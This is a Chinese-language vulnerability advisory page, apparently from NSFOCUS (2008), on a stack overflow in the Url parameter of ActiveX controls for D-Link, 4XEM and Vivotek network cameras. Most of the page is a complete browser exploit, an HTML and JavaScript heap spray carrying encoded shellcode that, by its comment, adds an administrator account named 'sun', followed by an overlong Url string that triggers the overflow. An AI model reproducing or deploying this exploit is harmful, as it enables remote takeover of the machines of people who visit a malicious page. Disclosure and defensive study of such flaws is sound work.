安全研究
安全漏洞
多个厂商网络摄像机ActiveX控件url参数栈溢出漏洞
发布日期:2008-02-27
更新日期:2008-02-28
受影响系统:
D-Link VAPGDecoder.dll 1.7.0.5描述:
4XEM VATDecoder.dll 1.0.0.51
Vivotek RtspVapgDecoderNew.dll 2.0.0.39
BUGTRAQ ID: 28010
D-Link MPEG4 SHM Audio Control、4XEM VatCtrl Class和Vivotek RTSP MPEG4 SP Control都是各自厂商的网络摄像机所安装的ActiveX控件。
上述网络摄像机的ActiveX控件实现上存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞控制用户系统。
VATDecoder.VatCtrl.1 ActiveX控件(VATDecoder.dll)、RtspVaPgCtrl Class ActiveX控件(RtspVapgDecoderNew.dll)和VAPgDecoder.VaPgCtrl.1 ActiveX控件(VAPGDecoder.dll)没有正确地验证分配给Url参数的字符串,如果用户受骗访问了恶意网页并向该参数传送了超长字符串的话,就可能触发栈溢出,导致执行任意指令。
<*来源:rgod (rgod@autistici.org)
链接:http://secunia.com/advisories/29146/
http://secunia.com/advisories/29145/
http://secunia.com/advisories/29131/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
D-Link MPEG4 SHM Audio Control (VAPGDecoder.dll 1.7.0.5) remote overflow
exploit (Internet Explorer 7/XP SP2)
check a live camera demonstration here with DCS-5300 camera series:
http://www.dlink.com/products/liveDemo/
This vulnerability affects in various incarnation the following controls:
4xem VatCtrl Class (VATDecoder.dll 1.0.0.51)
with CLSID: 210D0CBC-8B17-48D1-B294-1A338DD2EB3A
(check demo here: http://www.4xem.com/camerademos/)
RTSP MPEG4 SP Control (RtspVapgDecoderNew.dll 2.0.0.39)
with CLSID: 45830FF9-D9E6-4F41-86ED-B266933D8E90
by level ONE/ VIVOTEK
(check a demo here: http://ebdemo.8800.org:17151/)
user: demo1, password: [no pass]
rgod
-->
<html>
<object classid='clsid:A93B47FD-9BF6-4DA8-97FC-9270B9D64A6C' id='VAPGDECODERLib' />
</object>
<script language='javascript'>
//add su one, user: sun pass: tzu
shellcode = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949" +
"%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a" +
"%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241" +
"%u4142%u4230%u5841%u3850%u4241%u6d75%u6b39%u494c" +
"%u5078%u3344%u6530%u7550%u4e50%u716b%u6555%u6c6c" +
"%u614b%u676c%u3175%u6568%u5a51%u4e4f%u306b%u564f" +
"%u4c78%u414b%u774f%u4450%u4841%u576b%u4c39%u664b" +
"%u4c54%u444b%u7841%u466e%u6951%u4f50%u6c69%u6b6c" +
"%u6f34%u3330%u6344%u6f37%u6a31%u646a%u474d%u4871" +
"%u7842%u4c6b%u6534%u716b%u5144%u6334%u7434%u5835" +
"%u6e65%u736b%u646f%u7364%u5831%u756b%u4c36%u644b" +
"%u624c%u6c6b%u634b%u656f%u574c%u7871%u4c6b%u774b" +
"%u4c6c%u464b%u7861%u4f6b%u7379%u516c%u3334%u6b34" +
"%u7073%u4931%u7550%u4e34%u536b%u3470%u4b70%u4f35" +
"%u7030%u4478%u4c4c%u414b%u5450%u4c4c%u624b%u6550" +
"%u6c4c%u6e6d%u626b%u6548%u6858%u336b%u6c39%u4f4b" +
"%u4e70%u5350%u3530%u4350%u6c30%u704b%u3568%u636c" +
"%u366f%u4b51%u5146%u7170%u4d46%u5a59%u6c58%u5943" +
"%u6350%u364b%u4230%u7848%u686f%u694e%u3170%u3370" +
"%u4d58%u6b48%u6e4e%u346a%u464e%u3937%u396f%u7377" +
"%u7053%u426d%u6444%u756e%u5235%u3058%u6165%u4630" +
"%u654f%u3133%u7030%u706e%u3265%u7554%u7170%u7265" +
"%u5353%u7055%u5172%u5030%u4273%u3055%u616e%u4330" +
"%u7244%u515a%u5165%u5430%u526f%u5161%u3354%u3574" +
"%u7170%u5736%u4756%u7050%u306e%u7465%u4134%u7030" +
"%u706c%u316f%u7273%u6241%u614c%u4377%u6242%u524f" +
"%u3055%u6770%u3350%u7071%u3064%u516d%u4279%u324e" +
"%u7049%u5373%u5244%u4152%u3371%u3044%u536f%u4242" +
"%u6153%u5230%u4453%u5035%u756e%u3470%u506f%u6741" +
"%u7734%u4734%u4570");
bigblock = unescape("%u0a0a%u0a0a");
headersize = 20;
slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (i=0;i<500;i++){memory[i] = block+shellcode}
bof="http://";
for (i=0;i<9999;i++){bof+=unescape("%u0d0d%u0d0d")}
VAPGDECODERLib.Url = bof;
</script>
</html>
建议:
厂商补丁:
D-Link
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.dlink.com/
4XEM
----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.4xem.com/
Vivotek
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://ebdemo.8800.org:17151/
浏览次数:3784
严重程度:0(网友投票)
绿盟科技给您安全的保障